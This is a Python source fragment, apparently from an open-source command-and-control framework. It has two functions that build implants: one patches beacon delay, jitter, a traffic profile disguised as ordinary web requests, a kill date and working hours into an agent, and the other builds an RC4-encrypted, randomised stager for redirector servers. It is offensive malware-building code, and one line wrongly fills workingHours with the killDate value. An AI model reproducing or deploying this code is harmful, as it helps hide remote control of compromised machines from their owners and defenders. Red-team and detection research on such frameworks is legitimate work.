def generate_agent(self, delay, jitter, profile, killDate, workingHours, lostLimit): """ Generate "standard API" functionality, i.e. the actual agent.py that runs. This should always be sent over encrypted comms. """ f = open(self.installPath + "./data/agent/agent.py") code = f.read() f.close() # strip out comments and blank lines code = helpers.strip_python_comments(code) b64DefaultPage = base64.b64encode(http.default_page()) # patch in the delay, jitter, lost limit, and comms profile code = code.replace('delay = 60', 'delay = %s' % (delay)) code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter)) code = code.replace('profile = "/admin/get.php,/news.asp,/login/process.jsp|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', 'profile = "%s"' % (profile)) code = code.replace('lostLimit = 60', 'lostLimit = %s' % (lostLimit)) code = code.replace('defaultPage = base64.b64decode("")', 'defaultPage = base64.b64decode("%s")' % (b64DefaultPage)) # patch in the killDate and workingHours if they're specified if killDate != "": code = code.replace('killDate = ""', 'killDate = "%s"' % (killDate)) if workingHours != "": code = code.replace('workingHours = ""', 'workingHours = "%s"' % (killDate)) return code
def generate_stager_hop(self, server, key, profile, encrypt=True, encode=True): """ Generate the Python stager for hop.php redirectors that will perform key negotiation with the server and kick off the agent. """ # read in the stager base f = open(self.installPath + "./data/agent/stager_hop.py") stager = f.read() f.close() stager = helpers.strip_python_comments(stager) # first line of randomized text to change up the ending RC4 string randomHeader = "%s='%s'\n" % (helpers.random_string(), helpers.random_string()) stager = randomHeader + stager # patch the server and key information stager = stager.replace("REPLACE_SERVER", server) stager = stager.replace("REPLACE_STAGING_KEY", key) stager = stager.replace("REPLACE_PROFILE", profile) stager = stager.replace("index.jsp", self.stage1) stager = stager.replace("index.php", self.stage2) # # base64 encode the stager and return it # if encode: # return "" if encrypt: # return an encrypted version of the stager ("normal" staging) # return encryption.xor_encrypt(stager, key) return encryption.rc4(key, stager) else: # otherwise return the case-randomized stager return stager